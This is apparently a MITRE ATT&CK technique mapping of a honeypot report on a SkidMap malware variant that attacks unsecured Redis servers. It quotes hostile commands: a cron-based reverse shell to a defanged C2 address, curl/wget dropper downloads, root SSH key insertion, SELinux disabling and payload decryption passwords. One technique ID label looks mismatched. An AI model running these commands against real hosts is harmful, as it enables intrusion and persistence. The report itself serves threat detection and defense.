Honeypot Recon: New Variant of SkidMap Targeting Redis

MITRE Techniques

• [T1190] Exploit Public-Facing Application – The attack starts with an attempt to login to the unsecured Redis instance and set up variables that contain cron tasks hidden under a base64 string. – “The attack starts with an attempt to login to the unsecured Redis instance and set up variables that contain cron tasks hidden under a base64 string.”
• [T1053.005] Cron – Cron runs a job every 10 minutes by alternating between ‘curl’ and ‘wget’ to download and execute the dropper script ‘b’. – “Cron runs a job every 10 minutes by alternating between ‘curl’ and ‘wget’ to download and execute the dropper script ‘b’.”
• [T1098] SSH Authorized Keys – The malware adds SSH keys to root for persistent access. – “The following ssh keys in standard locations: ‘/root/.ssh/authoried_keys’ and ‘/root/.ssh/authoried_keys2’.”
• [T1562.001] Impair Defenses – The malware checks SELinux status and disables it permanently. – “The next step is to check the status of SELinux, then disable it permanently: /usr/sbin/sestatus … /usr/sbin/setenforce disabled.”
• [T1059.004] Unix Shell – A reverse shell is created via a cron-based call to a remote C2 server. – “The most interesting part is the highlighted line responsible for creating a reverse shell that will call back to the attackers’-controlled server (C2) every hour via TCP/8443 port: echo ‘bash -i >& /dev/tcp/69.30.221[.]154/8443 0>&1’ >> /etc/cron.hourly/prelink”
• [T1027] Obfuscated/Compressed Files and Information – Encoded/encrypted payloads are decrypted and executed; passwords for encrypted packages are provided (Xo@2089@md, go@1992@ld). – “This stage … decrypts accordingly and initiates executing shell scripts, installing kernel modules, followed by placing other executable binaries. … The password for the ‘gold’ packages is ‘Xo@2089@md’. For the ‘jpeg’ variant, the password is ‘go@1992@ld’.”
• [T1014] Rootkit – Discovery of hidden LKM rootkits in memory to hide activity. – “Static analysis of the memory dump confirmed two hidden malicious modules … Figure 17 – Hidden LKM rootkits.”
• [T1016] System Network Configuration Discovery – Kernel modules monitor network traffic via Netfilter hooks. – “The task of this module is to monitor the network using Netfilter hooks.” (kmeminfo.ko)
• [T1105] Ingress Tool Transfer – The bot downloads additional files from Canonical resources to support infection. – “Right after execution, the ‘bot’ downloads extra files. In the case of the Debian/Ubuntu variant, we observed connection to the official Canonical resources in order to download files required by the infection process.”
• [T1012] Resource Development (Kernel Modules) – Kernel modules (mcpuinfo.ko, kmeminfo.ko) extend capabilities and enable persistence/stealth. – “Extracted Module – mcpuinfo.ko … Kernel Module – mzoneinfo.ko (?)”